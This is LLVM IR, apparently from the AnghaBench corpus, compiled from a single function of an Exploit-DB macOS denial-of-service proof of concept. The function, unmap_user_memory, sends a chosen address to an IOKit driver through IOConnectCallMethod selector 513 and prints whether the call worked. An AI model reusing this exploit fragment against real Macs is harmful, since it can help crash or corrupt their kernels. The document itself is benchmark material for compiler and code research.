; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39616.c_unmap_user_memory.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39616.c_unmap_user_memory.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@KERN_SUCCESS = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [25 x i8] c"IOConnectCall error: %x\0A\00", align 1
@.str.1 = private unnamed_addr constant [9 x i8] c"worked?\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @unmap_user_memory(i32 %0, i64 %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i64, align 8
  %5 = alloca i64, align 8
  %6 = alloca [16 x i64], align 16
  %7 = alloca i64, align 8
  %8 = alloca [4096 x i8], align 16
  %9 = alloca i64, align 8
  %10 = alloca [16 x i64], align 16
  %11 = alloca i32, align 4
  %12 = alloca [4096 x i8], align 16
  %13 = alloca i64, align 8
  store i32 %0, i32* %3, align 4
  store i64 %1, i64* %4, align 8
  store i64 0, i64* %7, align 8
  store i64 0, i64* %9, align 8
  store i32 0, i32* %11, align 4
  store i64 0, i64* %13, align 8
  store i64 0, i64* %7, align 8
  store i64 8, i64* %9, align 8
  store i32 4096, i32* %11, align 4
  store i64 16, i64* %13, align 8
  %14 = load i64, i64* %4, align 8
  %15 = getelementptr inbounds [4096 x i8], [4096 x i8]* %8, i64 0, i64 0
  %16 = bitcast i8* %15 to i64*
  store i64 %14, i64* %16, align 16
  %17 = load i32, i32* %3, align 4
  %18 = getelementptr inbounds [16 x i64], [16 x i64]* %6, i64 0, i64 0
  %19 = load i64, i64* %7, align 8
  %20 = getelementptr inbounds [4096 x i8], [4096 x i8]* %8, i64 0, i64 0
  %21 = load i64, i64* %9, align 8
  %22 = getelementptr inbounds [16 x i64], [16 x i64]* %10, i64 0, i64 0
  %23 = getelementptr inbounds [4096 x i8], [4096 x i8]* %12, i64 0, i64 0
  %24 = call i64 @IOConnectCallMethod(i32 %17, i32 513, i64* %18, i64 %19, i8* %20, i64 %21, i64* %22, i32* %11, i8* %23, i64* %13)
  store i64 %24, i64* %5, align 8
  %25 = load i64, i64* %5, align 8
  %26 = load i64, i64* @KERN_SUCCESS, align 8
  %27 = icmp ne i64 %25, %26
  br i1 %27, label %28, label %31

28:                                               ; preds = %2
  %29 = load i64, i64* %5, align 8
  %30 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str, i64 0, i64 0), i64 %29)
  br label %33

31:                                               ; preds = %2
  %32 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.1, i64 0, i64 0))
  br label %33

33:                                               ; preds = %31, %28
  ret i64 0
}

declare dso_local i64 @IOConnectCallMethod(i32, i32, i64*, i64, i8*, i64, i64*, i32*, i8*, i64*) #1

declare dso_local i32 @printf(i8*, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
